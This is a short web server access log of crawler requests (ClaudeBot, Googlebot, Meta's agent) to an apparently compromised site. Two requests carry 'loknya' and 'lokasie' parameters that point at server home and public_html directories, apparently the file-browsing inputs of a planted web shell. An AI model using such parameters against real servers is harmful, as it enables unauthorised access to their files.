216.73.216.117 - - [21/Jul/2026:15:45:39 +0000] "GET /sitemap-13.xml?loknya=%2Fhome%2Fvmxfzbqj%2F.sitepad HTTP/2" 404 1921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.70 - - [21/Jul/2026:15:45:36 +0000] "GET /detail/6762840879 HTTP/1.1" 200 29387 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:15:45:38 +0000] "GET /detail/2448353000?lokasie=/home/vmxfzbqj/public_html/readme.html&loknya=/home/vmxfzbqj/public_html HTTP/1.1" 200 30684 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.0.18 - - [21/Jul/2026:15:45:40 +0000] "GET /items/B392332165/ HTTP/2" 429 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
